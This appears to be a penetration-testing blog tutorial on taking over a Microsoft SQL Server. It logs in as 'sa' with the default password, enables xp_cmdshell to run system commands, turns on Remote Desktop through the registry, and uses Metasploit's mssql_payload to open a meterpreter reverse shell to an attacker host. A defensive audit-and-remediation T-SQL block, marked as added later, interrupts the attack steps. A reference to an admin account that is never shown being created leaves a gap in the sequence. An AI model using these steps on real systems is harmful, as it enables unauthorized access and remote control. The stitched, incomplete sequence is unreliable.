In this article, we’ll cover connecting to a Microsoft SQL (MSSQL) server from the Backtrack/Linux command line, executing system commands through the ‘sa’ or other administrative account, and finally exploiting the ‘sa’ account through metasploit.
To start with, let’s cover a quick HOWTO on getting an MSSQL client working under Backtrack/Linux. We’ll need freetds and sqsh for this:
apt-get install sqsh freetds-bin freetds-common freetds-dev
Once done, we’ll need to edit /etc/freetds/freetds.conf, and append the following to it:
[MyServer]
host = 192.168.1.10
port = 1433
tds version = 8.0
And lastly, we’ll edit ~/.sqshrc:
\set username=sa
\set password=password
\set style=vert
Finally, we connect by issuing:
sqsh -S MyServer
If all went well, we should now be waiting at a prompt. First, let's see if we can enumerate a list of available databases with:
SELECT name FROM master..sysdatabases
go
Here are the results:
Great, so we're logged in as the system administrator ('sa') user, and we've managed to run a query that enumerates the databases. From this point we can use regular MSSQL syntax to interact with the server as we wish.
Taking a few steps back: the 'sa' account ships with a default password of 'password', and on our target system this had not been changed. Had the system administrator set a password, we could use 'mssql_brute.rc' from Metasploit or nmap's ms-sql-brute script to brute force the account password.
Back to the task at hand: now that we have MSSQL sa access, how can this be leveraged into remote code execution? This is where the 'xp_cmdshell' feature within MSSQL becomes useful. Prior to SQL Server 2005, xp_cmdshell was enabled by default; from 2005 onwards it is disabled by default. Assuming that xp_cmdshell is disabled, we first need to enable it as follows:
exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell', 1
go
reconfigure
go
We can then use the procedure to run arbitrary system commands in the security context of the SQL Server service with:
xp_cmdshell 'dir c:\'
go
We now have a working account within the Administrators group, and can proceed to connect to our newly created account via Remote Desktop. If Remote Desktop is not currently running, it can be enabled with:
xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
go
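From the defender's side, the two conditions this walkthrough depends on (a live 'sa' login with its default password, and xp_cmdshell switched on) are both visible from inside the instance. The following T-SQL is an added audit-and-remediation example, not part of the original post; it assumes SQL Server 2008 or later and a sysadmin login, since sp_configure, PWDCOMPARE and ALTER LOGIN all require elevated rights.

```sql
-- Added defensive check (not from the original post). Run as sysadmin
-- on SQL Server 2008+: audits the settings the walkthrough relies on,
-- then reverses them.

-- 1. Is xp_cmdshell (or 'show advanced options') currently enabled?
--    value_in_use = 1 means the feature is live on this instance.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Is the built-in 'sa' login enabled, and does it still accept the
--    default password the post relies on? 'sa' is identified by its
--    fixed SID 0x01, so this row is found even if the login was renamed.
SELECT name, is_disabled,
       PWDCOMPARE('password', password_hash) AS has_default_password
FROM sys.sql_logins
WHERE sid = 0x01;

-- 3. Remediation: switch xp_cmdshell off again, hide the advanced
--    options, then disable the 'sa' login outright (use the renamed
--    login name from step 2 if it is no longer called 'sa').
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
ALTER LOGIN sa DISABLE;

-- 4. Verify: both rows should now report value_in_use = 0, and the
--    login row should show is_disabled = 1.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
SELECT name, is_disabled FROM sys.sql_logins WHERE sid = 0x01;
```

Scheduling steps 1 and 2 as a recurring check (or alerting on sp_configure changes via SQL Server Audit) catches xp_cmdshell being re-enabled, which is the pivot point of both routes described in this post.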
As a second route, we can also exploit the account using Metasploit by using mssql_payload:
msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.120
msf exploit(mssql_payload) > set RHOST 192.168.1.10
msf exploit(mssql_payload) > set LPORT 8080
msf exploit(mssql_payload) > set PASSWORD password
msf exploit(mssql_payload) > exploit
The command stager uploads the payload while printing its progress to the terminal, and finally:
Game Over 😉